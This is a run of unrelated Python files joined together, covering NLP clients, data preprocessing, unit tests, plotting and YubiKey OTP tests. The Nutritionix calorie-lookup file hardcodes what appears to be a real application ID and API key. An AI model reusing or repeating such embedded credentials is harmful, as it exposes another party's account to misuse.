LOG_LEVEL = util.Argument('--loglevel', dest='loglevel', default=LOG_LEVEL)
LOG_DIR = util.Argument('--logdir', dest='logdir', default=LOG_DIR)
LOG_FILE = util.Argument('--logfile', dest='logfile', default=LOG_FILE)
LOG_INTERVAL = util.Argument(
    '--log-interval', dest='log_interval', type=int, default=LOG_INTERVAL
)
LOG_INTERVAL_UNIT = util.Argument(
    '--log-interval_unit', dest='log_interval_unit',
    choices=['h', 'm', 'd'], default=LOG_INTERVAL_UNIT
)
LOG_FORMAT = util.Argument(
    '--log-format', dest='log_format', default=LOG_FORMAT
)
LOG_BACKUPS = util.Argument(
    '--log-backups', dest='log_backups', type=int, default=LOG_BACKUPS
)
LOG_FILTERS = util.Argument(
    '--log-filters', dest='log_filters', nargs='*', default=LOG_FILTERS
)
DATABASE_TYPE = util.Argument(
    '--database-type', dest='database_type', default=DATABASE_TYPE
)
DATABASE_NAME = util.Argument(
    '--database-name', dest='database_name', default=DATABASE_NAME
)
DATABASE_USER = util.Argument(
    '--database-user', dest='database_user', default=DATABASE_USER
)
DATABASE_PASSWORD = util.Argument(
    '--database-password', dest='database_password', default=DATABASE_PASSWORD
)
DATABASE_HOST = util.Argument(
    '--database-host', dest='database_host', default=DATABASE_HOST
)
# BUG FIX: was assigned to the misspelled name DATABSE_PORT, so
# DATABASE_PORT stayed a plain int and --database-port had no effect.
DATABASE_PORT = util.Argument(
    '--database-port', dest='database_port', type=int, default=DATABASE_PORT
)
DATABASE_URI = util.Argument(
    '--database-uri', dest='database_uri', default=DATABASE_URI
)
def init_config():
    """Resolve every ConfigAttr placeholder in CONFIG_VARS to its final value."""
    global CONFIG_VARS
    for name, attr in list(CONFIG_VARS.items()):
        if isinstance(attr, util.ConfigAttr):
            CONFIG_VARS[name] = util.parse(attr)
|
from nutritionix import Nutritionix
from logos import getlogo
# Application ID:
appid = 'ffb27ccd'
# API Key:
apikey = '516561556bb62da642a4824b86084d02'
nix = Nutritionix(app_id=appid, api_key=apikey)
def search_calls(searchTerm):
    """Look up a food item on Nutritionix and return its calorie summary.

    Returns (searchTerm, human-readable calories-per-serving string,
    raw calorie count, serving unit). Prefers the first hit whose name
    contains searchTerm; otherwise falls back to the first hit.
    """
    hits = nix.search(searchTerm).json()['hits']
    itemID = None
    for hit in hits:
        if searchTerm in hit['fields']['item_name']:
            itemID = hit['fields']['item_id']
            break
    if not bool(itemID):
        # No name match — fall back to the top-ranked result.
        itemID = str(hits[0]['fields']['item_id'])
    item = nix.item(id=itemID).json()
    calories = item['nf_calories']
    grams = item['nf_serving_weight_grams']
    serving_quant = item['nf_serving_size_qty']
    serving_units = item['nf_serving_size_unit']
    serving = str(serving_quant) + " " + serving_units
    calories_per_serving = str(calories) + " calories per " + serving
    return searchTerm, calories_per_serving, calories, serving_units
if __name__ == '__main__':
    # Smoke test: OCR a logo image to text.
    # NOTE(review): `output` is computed but never used — confirm intent.
    file_name = "cheetos.png"
    output=str(getlogo(file_name))
import numpy as np
from nltk import sent_tokenize
import json, requests
# java -mx4g -cp "*" edu.stanford.nlp.pipeline.StanfordCoreNLPServer -port 9000 -timeout 15000000
class StanfordCoreNLP:
    """
    Thin HTTP client for a running Stanford CoreNLP server.

    Modified from https://github.com/smilli/py-corenlp
    """
    def __init__(self, server_url):
        # TODO: Error handling? More checking on the url?
        # Normalize: strip a single trailing slash.
        if server_url[-1] == '/':
            server_url = server_url[:-1]
        self.server_url = server_url

    def annotate(self, text, properties=None):
        """POST `text` to the server and return its annotations.

        If properties requests 'outputFormat': 'json', the response is
        parsed into a dict; otherwise (or on a parse failure) the raw
        response text is returned.
        """
        assert isinstance(text, str)
        if properties is None:
            properties = {}
        else:
            assert isinstance(properties, dict)

        # Checks that the Stanford CoreNLP server is started.
        try:
            requests.get(self.server_url)
        except requests.exceptions.ConnectionError:
            raise Exception('Check whether you have started the CoreNLP server e.g.\n'
                            '$ cd <path_to_core_nlp_folder>/stanford-corenlp-full-2016-10-31/ \n'
                            '$ java -mx4g -cp "*" edu.stanford.nlp.pipeline.StanfordCoreNLPServer -port <port> -timeout <timeout_in_ms>')

        data = text.encode()
        r = requests.post(
            self.server_url, params={
                'properties': str(properties)
            }, data=data, headers={'Connection': 'close'})
        output = r.text
        if ('outputFormat' in properties
                and properties['outputFormat'] == 'json'):
            try:
                # BUG FIX: json.loads() no longer accepts the `encoding`
                # keyword (removed in Python 3.9); the resulting TypeError
                # was silently swallowed by a bare except, so callers got
                # the unparsed string back. Also narrowed the except so
                # only genuine decode failures fall through.
                output = json.loads(output, strict=True)
            except ValueError:
                pass
        return output
class sentiment_classifier:
    """Sentence/paragraph sentiment scoring via a local CoreNLP server.

    Sentiment values: 0=Very negative, 1=Negative, 2=Neutral,
    3=Positive, 4=Very positive.
    """

    def __init__(self, text):
        self.text = text

    def sentiment_analysis_on_sentence(self, sentence):
        """Annotate `sentence` via CoreNLP and return its 'sentences' list."""
        # The StanfordCoreNLP server is expected at http://127.0.0.1:9000.
        corenlp = StanfordCoreNLP('http://127.0.0.1:9000')
        annotated = corenlp.annotate(sentence, properties={
            "annotators": "tokenize,ssplit,parse,sentiment",
            "outputFormat": "json",
            # enforceRequirements=false skips some annotators for speed.
            "enforceRequirements": "false",
        })
        # Each entry carries 'sentiment' and 'sentimentValue' attributes.
        assert isinstance(annotated['sentences'], list)
        return annotated['sentences']

    def sentence_sentiment(self, sentence):
        """Return a 1 x n int64 row vector of sentiment values for `sentence`."""
        assert isinstance(sentence, str)
        parsed = self.sentiment_analysis_on_sentence(sentence)
        count = len(parsed)
        sentiment_vec = np.zeros((1, count), dtype="int64")
        for idx in range(count):
            sentiment_vec[0, idx] = int(parsed[idx]['sentimentValue'])
        return sentiment_vec

    def paragraph_sentiment(self, text):
        """Return one sentiment score per sentence of the stored text.

        NOTE(review): tokenizes self.text, not the `text` argument —
        behavior kept as-is; confirm which was intended.
        """
        final_vector = []
        for sent in sent_tokenize(self.text):
            values = self.sentence_sentiment(sent)[0]
            if len(values) > 1:
                # CoreNLP split this sentence further: average the pieces.
                final_vector.append(sum(values) / len(values))
            else:
                final_vector.append(values[0])
        return final_vector

    def display_value_meanings(self):
        """Print the human-readable meaning of each sentiment value."""
        meanings = {'0': 'Very Negative', '1': 'Negative', '2': 'Normal',
                    '3': 'Good', '4': 'Very Good'}
        for key in sorted(meanings):
            print("{} stands for {}".format(key, meanings[key]))
if __name__ == '__main__':
    # Demo: score a sample paragraph (first assignment is overwritten).
    text = "You are stupid! You're smart and handsome. This is a tool. Rohan is a fantastic person and a great person!"
    text = "I think she makes some good points, and I think some things are just put out there and that she doesn't listen. She just wants only her opinion to be right to an extreme. She's good at analyzing situations, but she would not be good for a government position requiring much trust to keep stability, that is for sure. On the other hand, you probably want her to be your Republican lobbyist. A \"friend\" a \"Coulter Jr.\" told me about how great this book is. He acts just like Coulter, but just doesn't publish books and goes out and speaks like she does. Otherwise, he would probably be doing at least okay- (Coulter created and kept her niche first.) I am not particularly Democrat or Republican, but I try to give everything a chance. This book, while giving some fresh perspectives I would not have thought of, is quite hit or miss, too opinionated, and not always reasoning things out enough."
    senti = sentiment_classifier(text)
    senti.display_value_meanings()
    vector = senti.paragraph_sentiment(text)
    print(vector)
import sys
import dicomsdl as dicom
def show(args):
    """Display one frame of a DICOM file with PIL.

    args: [filename] or [filename, frame_index]; frame_index defaults to 0.
    Prints a message and returns without displaying when no filename is
    given or the index is out of range.
    """
    # BUG FIX: an empty args list previously fell through both branches,
    # leaving dcmfn/idx undefined and raising NameError below.
    if not args:
        print('usage: show <dicom-file> [frame-index]')
        return
    dcmfn = args[0]
    idx = int(args[1]) if len(args) > 1 else 0
    dset = dicom.open_file(dcmfn)
    info = dset.getPixelDataInfo()
    if idx >= info['NumberOfFrames']:
        print('File have %d frames.'%(info['NumberOfFrames']))
        return
    dset.to_pil_image(idx).show()
def main():
    """CLI entry point: forward command-line args to show()."""
    show(sys.argv[1:])
if __name__ == "__main__":
    main()
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 13 19:47:44 2017
@author: cm
"""
import os
import numpy as np
import pandas as pd
from hyperparameters import Hyperparamters as hp
import string
# Directory of the current working file (unused below — kept for parity).
pwd = os.path.dirname(os.path.abspath('__file__'))
#print(pwd)
def load_vocabulary():
    """Load the word list from the tab-separated dictionary file (column 0)."""
    word_dic = pd.read_csv('./dict/word_dict.txt', sep='\t', header=None)
    word = list(word_dic[0])
    return word
# Module-level vocabulary shared by the id-building helpers below.
vocabulary = load_vocabulary()
def engWordOfSentence(sentence):
    """Split a sentence into tokens, grouping ASCII-letter runs as one word.

    Consecutive ASCII letters are merged into a single capitalized token;
    every other character becomes its own token.
    """
    tokens = []
    current = ''
    for ch in sentence:
        if ch in string.ascii_letters:
            current += ch
        else:
            if current:
                tokens.append(current.capitalize())
                current = ''
            tokens.append(ch)
    if current:
        # Flush a trailing English word at end of sentence.
        tokens.append(current.capitalize())
    return tokens
def build_word_id(sentence):
    """Map a sentence to a fixed-length numpy array of vocabulary ids.

    Unknown tokens map to the 'unknow' id; output is truncated or
    <EOS>-padded to exactly hp.num_steps entries.
    """
    # English letter runs are treated as single word tokens.
    tokens = engWordOfSentence(sentence)
    ids = []
    eos_index = vocabulary.index('<EOS>')
    unknow_index = vocabulary.index('unknow')
    for token in tokens:
        try:
            # Single lookup (previously .index() was called twice per token).
            ids.append(vocabulary.index(token))
        except ValueError:
            ids.append(unknow_index)
    if len(ids) >= hp.num_steps:
        ids = ids[:hp.num_steps]
    else:
        ids.extend([eos_index] * (hp.num_steps - len(ids)))
    return np.array(ids)
def build_id(sent):
    """Convert a POS-tagged sentence ('word/label ...') into parallel id lists.

    Returns (words_id, labels_id): per-character vocabulary ids and BIO
    labels (1 = B for the first char of a place name ns/nsf, 2 = I for the
    rest, 0 = O otherwise). Characters absent from the vocabulary are
    skipped entirely; malformed chunks (not exactly 'word/label') are ignored.
    """
    words_id = []
    labels_id = []
    for chunk in sent.split():
        parts = chunk.split('/')
        if len(parts) != 2:
            continue
        word, label = parts
        # BUG FIX: the original used word_list.index(w) == 0 to detect the
        # first character, which is wrong for repeated characters (index()
        # always returns the first occurrence). Use the actual position.
        for pos, ch in enumerate(word):
            try:
                idx = vocabulary.index(ch)  # single lookup (was done twice)
            except ValueError:
                continue  # character not in vocabulary — skip it
            words_id.append(idx)
            if label in ('ns', 'nsf'):
                labels_id.append(1 if pos == 0 else 2)  # B=1 / I=2
            else:
                labels_id.append(0)  # O=0
    return words_id, labels_id
def build_id_n(sentences):
    """Batch build_id over `sentences`, truncated/zero-padded to hp.num_steps.

    Returns (word_ids, label_ids) as numpy arrays of shape
    (len(sentences), hp.num_steps).
    """
    w_ids, l_ids = [], []
    for sentence in sentences:
        w_id, l_id = build_id(sentence)
        if len(l_id) >= hp.num_steps:
            w_ids.append(w_id[:hp.num_steps])
            l_ids.append(l_id[:hp.num_steps])
        else:
            pad = hp.num_steps - len(l_id)
            w_ids.append(w_id + [0] * pad)
            l_ids.append(l_id + [0] * pad)
    return np.array(w_ids), np.array(l_ids)
if __name__ == '__main__':
    # Smoke tests on sample tagged sentences (first assignment overwritten).
    text = '我爱/n 中国/ns 人/l aa/d'
    text = '[武汉市/ns 江夏区/ns]/nz'
    build_id(text)
    a,b = build_id_n(['我爱/n 中国/ns ','我爱/n 武汉/ns'])
    a,b = build_id_n([text])
    print(a)
|
"""
Runs reduction rules to generate data/preprocessed/ from data/sanitized/
"""
import networkx as nx
from pathlib import Path
import time
import datetime
from src.preprocessing.graphs import (
read_edgelist,
write_edgelist,
write_huffner,
write_snap,
open_path,
reset_labels,
names_in_dir
)
from src.preprocessing.oct import oct_reductions
from src.preprocessing.vc import vc_reductions
def _create_preprocessing_dirs():
"""
Creates the directories needed for preprocessed data.
"""
preprocessed_dir = Path('.') / 'data' / 'preprocessed'
# Make directories if they do not exist
Path(preprocessed_dir / 'summary').mkdir(parents=True, exist_ok=True)
Path(preprocessed_dir / 'oct').mkdir(parents=True, exist_ok=True)
Path(preprocessed_dir / 'lookup').mkdir(parents=True, exist_ok=True)
Path(preprocessed_dir / 'edgelist').mkdir(parents=True, exist_ok=True)
Path(preprocessed_dir / 'huffner').mkdir(parents=True, exist_ok=True)
Path(preprocessed_dir / 'snap').mkdir(parents=True, exist_ok=True)
def _write_summary_header(csv_filename):
    """Write the CSV column-header row for a preprocessing summary file."""
    columns = ('Dataset', 'original_vertices', 'original_edges',
               'vertices_removed', 'edges_removed', 'oct', 'bipartite',
               'final_vertices', 'final_edges')
    with open_path(csv_filename, 'w') as outfile:
        outfile.write(','.join(columns) + '\n')
def _write_summary(graph, output_dir, csv_filename):
    """
    Append a summary line to a csv file.
    """
    meta = graph.graph
    row = (meta['name'], meta['original_vertices'], meta['original_edges'],
           meta['vertices_removed'], meta['edges_removed'], meta['oct'],
           meta['bipartite'], graph.order(), graph.size())
    with open_path(output_dir / csv_filename, 'a') as outfile:
        outfile.write(','.join(str(value) for value in row) + '\n')
def _write_oct_set(graph, oct_set, output_dir):
    """
    Write the oct vertices that were preprocessed out of the original graph.
    """
    filename = '{}.oct'.format(graph.graph['name'])
    with open_path(output_dir / filename, 'w') as outfile:
        outfile.writelines('{}\n'.format(vertex) for vertex in oct_set)
def _write_name_lookup(graph, output_dir):
    """
    Write a lookup table of preprocessed vertices to original names.
    Each line is [new_name] [original_name].
    """
    filename = '{}.lookup'.format(graph.graph['name'])
    original_names = nx.get_node_attributes(graph, 'og_name')
    with open_path(output_dir / filename, 'w') as outfile:
        for node in graph.nodes():
            outfile.write('{} {}\n'.format(node, original_names[node]))
def _convert_synthetic(data_names):
    """Preprocess each named edgelist dataset and write all output formats.

    For each dataset: read, repeatedly apply OCT and VC reductions until a
    fixed point, then write summary stats, the removed OCT set, the vertex
    name lookup, and edgelist/huffner/snap encodings of the reduced graph.
    """
    # Define some directories-of-interest paths
    input_dir = Path('.') / 'data' / 'sanitized'
    output_dir = Path('.') / 'data' / 'preprocessed'
    # Remove the old statistics CSV
    summary_dir = Path(output_dir / 'summary')
    summary_filename = summary_dir / 'synthetic.csv'
    if summary_filename.is_file():
        Path(summary_filename).unlink()
    else:
        summary_dir.mkdir(exist_ok=True, parents=True)
    _write_summary_header(summary_filename)
    # Convert datasets
    for dataset in data_names:
        timestamp = datetime.\
            datetime.\
            fromtimestamp(time.time()).strftime('%Y/%m/%d-%H:%M:%S:')
        print('{} Processing {}'.format(timestamp, dataset))
        # Process the graph
        graph = read_edgelist(input_dir / 'edgelist', dataset)
        graph = reset_labels(graph)
        # Remember the original size for the summary stats.
        graph.graph['original_vertices'] = graph.order()
        graph.graph['original_edges'] = graph.size()
        oct_set = set()
        graph_reduced = True
        # Alternate OCT and VC reductions until neither changes the graph.
        while graph_reduced:
            # Require a change for graph_reduced to be triggered again
            graph_reduced = False
            # Compute OCT reductions
            print("- Computing OCT reduction")
            graph = reset_labels(graph)
            changed, graph, oct_set = oct_reductions(graph, oct_set)
            if changed:
                print("-- OCT reduced graph")
                graph_reduced = True
            # Compute VC reductions (snap written first: vc_reductions
            # presumably reads it back — confirm in src.preprocessing.vc).
            print("- Computing VC reduction")
            graph = reset_labels(graph)
            write_snap(graph, output_dir / 'snap')
            changed, graph, oct_set = vc_reductions(graph, oct_set)
            if changed:
                print("-- VC reduced graph")
                graph_reduced = True
        # Write the results
        graph = reset_labels(graph)
        _write_summary(graph, output_dir / 'summary', 'synthetic.csv')
        _write_oct_set(graph, oct_set, output_dir / 'oct')
        _write_name_lookup(graph, output_dir / 'lookup')
        write_edgelist(graph, output_dir / 'edgelist')
        write_huffner(graph, output_dir / 'huffner')
        write_snap(graph, output_dir / 'snap')
    print('Finished preprocessing synthetic data')
if __name__ == '__main__':
    """
    Runs preprocessing on all synthetic graphs.
    """
    # Compute the synthetic graph names and preprocess
    _create_preprocessing_dirs()
    input_dir = Path('.') / 'data' / 'sanitized' / 'edgelist'
    datasets = names_in_dir(input_dir, '.edgelist')
    # Quantum data has no dashes, synthetics use dashes to separate parameters
    datasets = sorted(list(filter(lambda x: '-' in x, datasets)))
    # Add the extension back to the dataset name
    datasets = [x + '.edgelist' for x in datasets]
    print('Preprocessing {} datasets'.format(len(datasets)))
    _convert_synthetic(datasets)
|
import dbInfo as di
import tfIdfCalc as idf
import numpy as np
def getActorTagMatrix():
    """Build the actor x tag TF-IDF matrix.

    Rows follow di.getAllActors() order, columns follow di.getAllTags()
    order; cells hold the actor's TF-IDF weight for that tag (0 if absent).
    """
    tagIds = di.getAllTags()
    tagLen = len(tagIds)
    actorlist = di.getAllActors()
    actorTags = np.zeros((len(actorlist), tagLen))
    # IDF vector is shared across all actors — compute once.
    idfActVector = idf.idfActorTag()
    # enumerate replaces the manual row counter of the original;
    # the unused di.getAllActorNames() call was removed.
    for row, actor in enumerate(actorlist):
        actVect = idf.tfIdfActorTag(actor[0], idfActVector)
        for col in range(tagLen):
            tag_id = tagIds[col][0]
            if tag_id in actVect:  # direct membership test, no .keys() list
                actorTags[row][col] = actVect[tag_id]
    return actorTags
def getCoactorMatrix():
    """Build the actor x actor co-appearance matrix.

    sim[i][j] is the number of movies actors i and j have in common
    (diagonal holds each actor's own movie count).
    """
    actorList = di.getAllActors()
    actLen = len(actorList)
    # PERF: fetch and convert each actor's movie list to a set exactly once;
    # the original rebuilt both sets inside the O(n^2) inner loop.
    movie_sets = [set(di.getActorMovieIds(actor[0])) for actor in actorList]
    sim = np.zeros((actLen, actLen))
    for i in range(actLen):
        for j in range(actLen):
            sim[i][j] = len(movie_sets[i] & movie_sets[j])
    return sim
import unittest
from programy.storage.stores.nosql.mongo.dao.property import DefaultVariable
from programy.storage.stores.nosql.mongo.dao.property import Property
from programy.storage.stores.nosql.mongo.dao.property import Regex
class PropertyTests(unittest.TestCase):
    """Round-trip and repr tests for the Mongo Property DAO."""
    # Changes from original: local `property` renamed (shadowed the builtin),
    # deprecated assertEquals -> assertEqual, one duplicated assertion removed.

    def test_init_no_id(self):
        prop = Property(name='name', value='value')
        self.assertIsNotNone(prop)
        self.assertIsNone(prop.id)
        self.assertEqual('name', prop.name)
        self.assertEqual('value', prop.value)
        self.assertEqual({'value': 'value', 'name': 'name'}, prop.to_document())

    def test_init_with_id(self):
        prop = Property(name='name', value='value')
        prop.id = '666'
        self.assertIsNotNone(prop)
        self.assertIsNotNone(prop.id)
        self.assertEqual('666', prop.id)
        self.assertEqual('name', prop.name)
        self.assertEqual('value', prop.value)
        self.assertEqual({'_id': '666', 'value': 'value', 'name': 'name'}, prop.to_document())

    def test_from_document_no_id(self):
        property1 = Property.from_document({'value': 'value', 'name': 'name'})
        self.assertIsNotNone(property1)
        self.assertIsNone(property1.id)
        self.assertEqual('name', property1.name)
        self.assertEqual('value', property1.value)

    def test_from_document_with_id(self):
        property2 = Property.from_document({'_id': '666', 'value': 'value', 'name': 'name'})
        self.assertIsNotNone(property2)
        self.assertIsNotNone(property2.id)
        self.assertEqual('666', property2.id)
        self.assertEqual('name', property2.name)
        self.assertEqual('value', property2.value)

    def test_repr_no_id(self):
        property1 = Property.from_document({'value': 'value', 'name': 'name'})
        self.assertEqual("<Property(id='n/a', name='name', value='value')>", str(property1))

    def test_repr_with_id(self):
        property2 = Property.from_document({'_id': '666', 'value': 'value', 'name': 'name'})
        self.assertEqual("<Property(id='666', name='name', value='value')>", str(property2))
class DefaultVariableTests(unittest.TestCase):
    """Round-trip and repr tests for the Mongo DefaultVariable DAO."""
    # Change from original: local `property` renamed (shadowed the builtin).

    def test_init_no_id(self):
        prop = DefaultVariable(name='name', value='value')
        self.assertIsNotNone(prop)
        self.assertIsNone(prop.id)
        self.assertEqual('name', prop.name)
        self.assertEqual('value', prop.value)
        self.assertEqual({'value': 'value', 'name': 'name'}, prop.to_document())

    def test_init_with_id(self):
        prop = DefaultVariable(name='name', value='value')
        prop.id = '666'
        self.assertIsNotNone(prop)
        self.assertIsNotNone(prop.id)
        self.assertEqual('666', prop.id)
        self.assertEqual('name', prop.name)
        self.assertEqual('value', prop.value)
        self.assertEqual({'_id': '666', 'value': 'value', 'name': 'name'}, prop.to_document())

    def test_from_document_no_id(self):
        property1 = DefaultVariable.from_document({'value': 'value', 'name': 'name'})
        self.assertIsNotNone(property1)
        self.assertIsNone(property1.id)
        self.assertEqual('name', property1.name)
        self.assertEqual('value', property1.value)

    def test_from_document_with_id(self):
        property2 = DefaultVariable.from_document({'_id': '666', 'value': 'value', 'name': 'name'})
        self.assertIsNotNone(property2)
        self.assertIsNotNone(property2.id)
        self.assertEqual('666', property2.id)
        self.assertEqual('name', property2.name)
        self.assertEqual('value', property2.value)

    def test_repr_no_id(self):
        property1 = DefaultVariable.from_document({'value': 'value', 'name': 'name'})
        self.assertEqual("<DefaultVariable(id='n/a', name='name', value='value')>", str(property1))

    def test_repr_with_id(self):
        property2 = DefaultVariable.from_document({'_id': '666', 'value': 'value', 'name': 'name'})
        self.assertEqual("<DefaultVariable(id='666', name='name', value='value')>", str(property2))
class RegexTests(unittest.TestCase):
    """Round-trip and repr tests for the Mongo Regex DAO."""
    # Changes from original: local `property` renamed (shadowed the builtin),
    # deprecated assertEquals -> assertEqual.

    def test_init_no_id(self):
        prop = Regex(name='name', value='value')
        self.assertIsNotNone(prop)
        self.assertIsNone(prop.id)
        self.assertEqual('name', prop.name)
        self.assertEqual('value', prop.value)
        self.assertEqual({'value': 'value', 'name': 'name'}, prop.to_document())

    def test_init_with_id(self):
        prop = Regex(name='name', value='value')
        prop.id = '666'
        self.assertIsNotNone(prop)
        self.assertIsNotNone(prop.id)
        self.assertEqual('666', prop.id)
        self.assertEqual('name', prop.name)
        self.assertEqual('value', prop.value)
        self.assertEqual({'_id': '666', 'value': 'value', 'name': 'name'}, prop.to_document())

    def test_from_document_no_id(self):
        property1 = Regex.from_document({'value': 'value', 'name': 'name'})
        self.assertIsNotNone(property1)
        self.assertIsNone(property1.id)
        self.assertEqual('name', property1.name)
        self.assertEqual('value', property1.value)

    def test_from_document_with_id(self):
        property2 = Regex.from_document({'_id': '666', 'value': 'value', 'name': 'name'})
        self.assertIsNotNone(property2)
        self.assertIsNotNone(property2.id)
        self.assertEqual('666', property2.id)
        self.assertEqual('name', property2.name)
        self.assertEqual('value', property2.value)

    def test_repr_no_id(self):
        property1 = Regex.from_document({'value': 'value', 'name': 'name'})
        self.assertEqual("<Regex(id='n/a', name='name', value='value')>", str(property1))

    def test_repr_with_id(self):
        property2 = Regex.from_document({'_id': '666', 'value': 'value', 'name': 'name'})
        self.assertEqual("<Regex(id='666', name='name', value='value')>", str(property2))
|
# -*- coding: utf-8 -*-
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from pandas import DataFrame
import pandas as pd
from sklearn.datasets import load_iris
from sklearn.decomposition import PCA
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.metrics import accuracy_score
# Load the iris dataset
iris = load_iris()
# sklearn's built-in description of the dataset
# print(iris.DESCR)
# Extract the data contents
iris_data = iris.data
feature_names = iris.feature_names
iris_target = iris.target
# Reshape targets to a column so they can be stacked with the features
iris_target.shape = (150,1)
iris_all = np.hstack((iris_data, iris_target))
# Convert to DataFrames
iris_data_df = DataFrame(iris_data,columns=feature_names)
iris_target_df = DataFrame(iris_target,columns=['target'])
iris_data_all_df = DataFrame(iris_all,columns=feature_names+['target'])
# Data preview
# print("first rows")
# print(iris_data_all_df.head(2))     # first rows
# print("last rows")
# print(iris_data_all_df.tail(2))     # last rows
# print("random sample")
# print(iris_data_all_df.sample(2))   # random sample
# print("shape")
# print(iris_data_all_df.shape)
# print("dtypes")
# print(iris_data_all_df.dtypes)
# print("misc info")
# print(iris_data_all_df.info())
# Statistical description
# print(iris_data_all_df.describe())  # common summary statistics
# Data range
# sns.boxplot(data=iris_data_all_df)
# plt.show()
# Overview plot
# plt.plot(iris_data_df)
# plt.legend(feature_names)
# plt.show()
# Extract a subset (sepal columns) for plotting —
# a partial-data plot is easier to inspect.
# sepal
sepal_data_df = iris_data_df[['sepal length (cm)','sepal width (cm)']]
plt.plot(sepal_data_df)
plt.legend(['sepal length (cm)','sepal width (cm)'])
plt.title('sepal data')
# plt.show()
# NOTE(review): `size=` was renamed to `height=` in seaborn >= 0.9 — confirm
# the pinned seaborn version before changing.
sns.pairplot(iris_data_all_df, vars=iris_data_all_df.columns[:4], hue='target', size=3, kind='reg')
plt.show()
|
import numpy as np
import pandas as pd
from Sliding import *
from os import path
import os
from os import listdir
from os.path import isfile, join
def main(subject_directory):
    """Relabel a subject's LAB file in place (Python 2 script: print statement).

    Rewrites the label CSV so that bending-down labels sandwiched by a
    picking label are re-labelled as bending-up (see relabel_matrix).
    """
    path = get_path(subject_directory)
    print path
    label_matrix = load_file_as_matrix(path)
    # What label occurs before
    before_label = 18  # Bending down
    criteria_label = 11  # Picking
    after_label = 10  # Bending up
    df_label = relabel_matrix(label_matrix, before_label, criteria_label, after_label)
    # Overwrite the source file with the relabelled data.
    df_label.to_csv(path, header=None, index=False)
def relabel_matrix(matrix, before_label, criteria_label, after_label):
    """Rewrite label runs in an Nx1 label matrix, returning a DataFrame.

    Starting at a `before_label` entry that directly follows a
    `criteria_label`, every subsequent entry is overwritten with
    `after_label` until an `after_label` entry is followed by something
    other than `before_label`. The matrix is modified in place.
    """
    rewriting = False
    for idx in range(1, len(matrix)):
        previous, current = matrix[idx - 1], matrix[idx]
        # Start rewriting: the shifting activity precedes the target label.
        if previous == criteria_label and current == before_label:
            rewriting = True
        # Stop rewriting: previous entry was already the replacement label
        # and the current one is no longer the target label.
        if previous == after_label and current != before_label:
            rewriting = False
        if rewriting:
            matrix[idx] = [after_label]
    return pd.DataFrame(matrix)
def load_file_as_matrix(path):
    """Read a headerless CSV label file into a 2-D numpy array.

    Fixes: the original passed a backslash-escaped comma as ``sep`` (an
    invalid string escape that also forced the slow regex engine), and used
    ``DataFrame.as_matrix()``, which has been removed from modern pandas.
    ``.values`` works on both old and new pandas versions.
    """
    return pd.read_csv(path, header=None, sep=',').values
def get_path(subject_directory):
    """Return the full path of the label ("LAB") file for a subject.

    Looks in <repo>/data/<subject_directory>/RAW_SIGNALS/ and returns the
    last file whose name contains "LAB".
    """
    signal_folder = "/RAW_SIGNALS/"
    # Two levels up from this module, then into the data directory.
    parent_dir = os.path.dirname(os.path.dirname(__file__))
    subject_path = os.path.join(parent_dir, 'data/' + subject_directory)
    signal_dir = subject_path + signal_folder
    for entry in listdir(signal_dir):
        if not isfile(join(signal_dir, entry)):
            continue
        if "LAB" in entry:
            lab_name = entry
    # Like the original, raises a NameError-style failure if no LAB file exists.
    return signal_dir + lab_name
# Entry point: relabel the picking activity for subject recording "01A".
if __name__ == "__main__":
    main("01A")
def prediction_model(pclass, sex,age,sibsp,parch,fare,embarked,title):
    """Load the pickled Titanic model and return its prediction for one passenger.

    Returns whatever the persisted estimator's ``predict`` yields for the
    single feature row (for scikit-learn models, an array with one element).

    Fixes: the original loaded the model but never predicted or returned
    anything, and leaked the open file handle.
    """
    import pickle
    import os
    BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
    file_dir = os.path.join(BASE_DIR, 'titanic_model.sav')
    x = [[pclass, sex, age, sibsp, parch, fare, embarked, title]]
    with open(file_dir, 'rb') as model_file:
        randomforest = pickle.load(model_file)
    return randomforest.predict(x)
|
# otp_test.py - Unit tests for the OTP1 and OTP2.
#
# NOTE test1() requires a physical YubiKey with a specific configuration.
import otp
import sys
import yubico
from Crypto.Cipher import AES
from Crypto.Hash import HMAC, SHA, SHA256
from yubico.yubico_util import crc16
# Shared fixtures for the OTP tests (Python 2: plain str literals are bytes).
test_key = '\x00' * 32
test_id = 'fellas'
# Expected ciphertext for the Frame2 built in test2(); the 'hex' str codec is
# Python 2 only.
test_enciphered_frame = '791d7888f464196075998d924c5db007'.decode('hex')
test_tweak = 'tweak'
test_payload = 'hype' * 3
def test1():
    '''Tests the OTP1 protocol.
    Requires a YubiKey with OTP challenge-response configured in slot 2. The key
    should be a 16-byte, all-zero string.
    '''
    bc = AES.new(test_key[:16])
    # Fake previous frame (for testing).
    last_frame = otp.Frame(bc.block_size)
    # Test OTP validation.
    p = "beefbeefbeeflctgglfhfgnekelfhvhufjretgdnhvkf"
    (id, frame) = otp.Frame.from_otp(bc, p)
    assert frame.ok() # Check CRC
    assert last_frame < frame # Check the counter is fresh
    assert frame.payload == '\x00' * 6 # Check that the private ID matches
    assert frame.get_otp(bc, id) == p # Test get_otp()
    # Test OTP1 protocol. This uses the OTP challenge-response protocol.
    try:
        key = yubico.find_yubikey(debug=False)
        # Derive a fixed 6-byte challenge from a constant string.
        h = SHA256.new()
        h.update('woodland')
        challenge = h.digest()[:6]
        for i in range(10):
            enciphered_frame = key.challenge_response(challenge, mode='OTP', slot=2)
            raw_frame = bc.decrypt(enciphered_frame)
            frame = otp.Frame(raw_frame)
            assert frame.ok()
            # Each response must carry a strictly increasing counter.
            assert last_frame < frame
            assert frame.payload == challenge
            last_frame = frame
    except yubico.yubico_exception.YubicoError as e:
        print e.reason
        sys.exit(1)
def test2():
    ''' Tests the OTP2 code.
    This uses SoftKey2 for testing.
    '''
    # Frame2 parses mode (1 byte) and a little-endian 3-byte counter.
    frame = otp.Frame2('\x01\x02\x03\x04' + '\x00' * 16)
    assert frame.mode == 1
    assert frame.ct == 2 + ((3 + (4 << 8)) << 8)
    assert frame.payload == '\x00' * (frame.block_size - 4)
    # Cipher for encryption, HMAC-SHA1 for authentication (key is split in two).
    bc = AES.new(test_key[:16])
    h = HMAC.new(test_key[16:], digestmod=SHA)
    # An int argument yields an all-zero frame of that block size.
    frame = otp.Frame2(bc.block_size)
    assert frame.mode == 0
    assert frame.ct == 0
